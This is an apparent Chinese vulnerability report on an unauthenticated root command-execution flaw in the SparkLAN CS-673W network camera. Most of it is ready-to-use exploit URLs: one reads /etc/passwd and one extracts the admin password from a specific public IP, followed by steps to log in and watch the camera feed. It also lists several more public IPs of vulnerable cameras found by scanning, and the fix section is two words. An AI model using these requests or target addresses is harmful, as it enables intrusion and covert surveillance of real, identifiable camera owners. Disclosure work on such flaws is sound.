SparkLAN网络摄像头CS-673W命令执行漏洞可窃取管理员密码致严重隐私泄露

http://www.sparklan.com/p2-products-detail.php?PKey=c33dIvahuWbzpkuB-Mvy1_Fz0DmF0T8VP_GG7A5Vzic&CAS-673W

SparkLAN,台湾公司。

参考CVE-2013-1599,原漏洞主要涉及D-Link,本漏洞中的CS-673W同样中招,

该摄像头产品中/var/www/cgi-bin/rtpd.cgi可在未验证情况下接受攻击者的恶意请求,以root身份执行任意命令。

 

1.查看/etc/passwd

http://183.179.253.135/cgi-bin/rtpd.cgi?cat&/etc/passwd

2.获取摄像头密码

http://183.179.253.135/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount

3.远程监控

拿到密码后,以用户名admin登陆http://183.179.253.135/
 

SparkLAN网络摄像头CS-673W命令执行<a href=漏洞可窃取管理员密码致严重隐私泄露" />

4.如何证明这是通用?(漏洞特殊,请在漏洞确认后请删除该部分内容)

小范围扫描,可得:

http://112.118.251.213/

http://14.198.20.207/

http://59.149.83.240/

……

扫描的结果主要集中在香港,有钱人,huh?

修复方案:

加强验证